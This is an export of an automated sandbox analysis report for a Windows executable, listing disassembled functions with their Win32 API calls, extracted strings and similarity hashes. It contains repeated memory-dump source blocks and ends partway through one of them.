                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 217fe5fb5594f3cd53023db848c5bb6ff40143767b2d35dcfd7bebbdd5a9bbf5
                                                                                                                                                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                                  • Opcode Fuzzy Hash: 217fe5fb5594f3cd53023db848c5bb6ff40143767b2d35dcfd7bebbdd5a9bbf5
                                                                                                                                                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                                  Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 2353593579-4108050209
                                                                                                                                                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                                  Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1744303182-0
                                                                                                                                                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                                  Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                                                                  • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0046F356
                                                                                                                                                                  • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                                                                  • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$EnumForegroundWindows$ChildDesktop
                                                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                  • API String ID: 4293069593-1919597938
                                                                                                                                                                  • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                  • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                                                                                                                                                  • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                  • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                                                                                                                                                  Function 0046B9D7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseConnectCreateRegistry
                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                  • API String ID: 3217815495-966354055
                                                                                                                                                                  • Opcode ID: 4e8270c5edde0ca8bc7351f5e59e790f56017af10183f1cc1b4432f724b8c6fd
                                                                                                                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e8270c5edde0ca8bc7351f5e59e790f56017af10183f1cc1b4432f724b8c6fd
                                                                                                                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                  Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                                  Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$CtrlFocus
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1534620443-4108050209
                                                                                                                                                                  • Opcode ID: 70ffeecb0d74d45a8ada8319ec647cc993707ad6458148b4a2a519c1a340f22a
                                                                                                                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                  • Opcode Fuzzy Hash: 70ffeecb0d74d45a8ada8319ec647cc993707ad6458148b4a2a519c1a340f22a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                  Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateDestroy
                                                                                                                                                                  • String ID: ,$tooltips_class32
                                                                                                                                                                  • API String ID: 1109047481-3856767331
                                                                                                                                                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                  Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1441871840-4108050209
                                                                                                                                                                  • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                                  • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                                  Function 0042009C Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 134libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(USER32.DLL,00496840,00000314,00000000), ref: 004200D7
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004200F3
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00420111
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00420121
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00420131
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00420145
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: @hI$GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                                  • API String ID: 2238633743-2115754596
                                                                                                                                                                  • Opcode ID: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
                                                                                                                                                                  • Instruction ID: 87ede4d0b4904396a69794b8bbcc3e401081f17338994847c77f403133c188a5
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F411C71A0031AABDB10ABB5AD89E6F7BF8AB54340F54043BA905E2351DB79D910CB68
                                                                                                                                                                  Function 00417C20 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
